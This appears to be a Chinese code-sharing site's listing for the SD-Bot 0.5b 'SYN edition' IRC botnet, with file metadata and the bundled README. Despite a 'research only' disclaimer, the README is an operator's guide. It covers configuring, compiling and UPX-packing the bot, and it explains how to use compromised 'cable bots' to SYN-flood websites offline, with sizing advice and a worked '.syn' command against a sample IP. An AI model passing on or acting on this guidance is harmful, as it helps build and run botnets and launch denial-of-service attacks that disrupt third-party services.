sdbot05b_syn_&_nick
所属分类:网络编程
开发工具:C/C++
文件大小:38KB
下载次数:352
上传日期:2006-04-30 09:52:08
上 传 者:
ro2002cky
说明: 著名的SD-Bot僵尸工具,只供研究,不要恶意使用。
(famous SD- bot zombie tools, the use of research, not malicious use.)
文件列表:
commandref.html (33954, 2002-12-22)
make-lcc.bat (522, 2002-12-22)
sdbot05b.c (77767, 2003-07-17)
sdbot.jpg (11152, 2002-12-22)
sdbot 0.5b (test release) by [sd]
with SYN mod by Tesla
===================================
web site: http://sd.wintermarket.org
irc: irc.lcirc.net, #sdbot
notes on this special edition
-------------------------------
Functionally, there are only three differences between
this "sdbot SYN edition" and the last (0.5b) release;
the .syn command, a tiny fix to the .systeminfo
command (the MHz calculation under LCC), and the
"currently logged on user" part in the .systeminfo
command. I didn't want to add a bunch of mods at once
because not everyone wants hostmasking, socks4, etc.
If you want to add a mod yourself, check out Red
Fusion Mods: http://www.rf-mods.com
..everyone is encouraged to "trick out" their sdbot.
Q: Why release a whole package and not just the code
snippets like on Red Fusion?
A: Because sdbot was using the old winsock libs and
the SYN flood requires raw WSASockets, which Ws2_32.lib
has. The make-lcc.bat is updated. If you want to build
this special edition with MSVC or MING, you'll need to
tell it to use Ws2_32.lib - I haven't included project
or make files because I only use/have LCC.
Q: Most of my bots just stop right away and say
"Done with SYN flood [0KB/sec]" .. what's up?
A: Win95 and *** will not allow the level of packet
manipulation required by the SYN flood. They will
always return 0 right away. Win2k and NT will only
do it if an administrator is logged on, which is
why I've added the username to the .systeminfo
command. XP should always work fine. My advice is
to .remove bots that use 9x on general principals.
Q: What are the best parameters for taking down a
webserver/IRCd/whatever?
A: The whole idea behind a SYN flood is to force the
remote host to stop accecpting new connections on the
desired port. Each OS has a different limit and timeout
but in general, 5 to 16 SYN_WAIT state sockets will
lock up a given port for 75-180 seconds. Newer or
freshly patches systems will require [much] more. My
suggestion is to keep the syn running for as long as
you want to shutdown the port and use 3 cable/edu bots
for every 100KB/sec the host is capable of multiplied
by the number of servers in their farm (if more than 1).
Example: You want to make the website for
randomtarget.com "unavailable" for 10 minutes. They are
running a single linux box at their hosting company
with an older kernel on a 1Mbit line. You .dns
www.randomtarget.com and find it's IP is 192.148.34.1
You'll need to issue this command to [at least] 2 of
your [reliable] cable bots: .syn 192.148.34.1 80 600
Q: How much size does all this extra stuff add?
A: None! I think it's smaller, even. 33824 bytes
unpacked and 13856 packed with UPX. I "fixed" the
batch file to optimize the output better.
That's 13KB. You're welcome.
how to edit the source file
-----------------------------
extract the files from the zip into a folder, and
look for a file called 'sdbot05b.c' (LCC/mingw) or
'sdbot05b.cpp' (MSVC++). these are source files for
sdbot. the contents of both files are exactly the
same, they are seperate files mainly for the sake
of convenience.
near the beginning of the source file, you'll see a
section with the title '// bot configuration' at the
top of it. simply edit the strings in this section to
whatever you want. if you're not compiling with LCC,
mingw or MS Visual C++, you may have to insert numbers
into the brackets that correspond to the string
length. make sure that the number in brackets is at
least the length of the string plus 1. for example, i
might change:
const char botid[] = "sdbot2"; // bot id
to:
const char botid[9] = "sdbot123"; // bot id
^-changed to 9 (length of string
plus 1)
the section directly above that one has a few sample
aliases in it, modify those however you want, making
sure that there's a '\' at the end of all the aliases
except the last one, and that maxaliases is set to a
number greater than the number of aliases.
there are a bunch of #define lines with '//' in front
of them. removing the '//' from the beginning of one
will cause a particular function to be disabled. for
example, NO_SYSINFO controls whether or not the system
info command is included in the compiled exe.
how to compile with lcc
-------------------------
first of all, you'll need LCC (which you can get from
http://www.q-software-solutions.com/lccwin32/) installed
on your system. edit the make-lcc.bat file, changing
'c:\lcc' to point to the location of your lcc folder, then
run it. an exe file should appear in the folder that you
extracted the sdbot files into.
how to pack the exe
---------------------
if you want to pack the exe (to make it smaller) i would
recommend that you use UPX, which is available at
http://upx.sourceforge.net/. just put upx in the folder
with your sdbot exe, then run: upx --best sdbot05b.exe
there are provisions for this in the .bat file; just
put UPX in your LCC/bin directory and un-REM the
appropriate line.
changes since 0.5a
--------------------
now compiles with mingw (which also means that you can now compile it with dev-c++)
dynamic loading of a few more functions, should be more compatible with older systems now
fixed 3 letter nick bug in spy
fixed c_privmsg and c_action
fixed clone acting like spy bug
fixed random nick generator (now includes the letter 'z')
fixed login/logout issues with private messages
fixed sending udp/ping to IPs that don't resolve
fixed VERSION request to channel bug
fixed a few other minor issues
system info now displays service packs (if installed)
bot no longer messages the channel when a logged in user quits
improved dns (can now resolve both IPs and hostnames)
spy now relays mode changes
addded visit command (for simulating site visits)
added the ability to use variables in normal commands
added delay command
added notice (-n) parameter
you can now specify a backup channel for the backup server
bot now responds to notices with notices instead of privmsgs
should now run on NT (as long as IE 4 or higher is installed)
improved stability (hopefully)
various other improvements
近期下载者:
相关文件:
收藏者: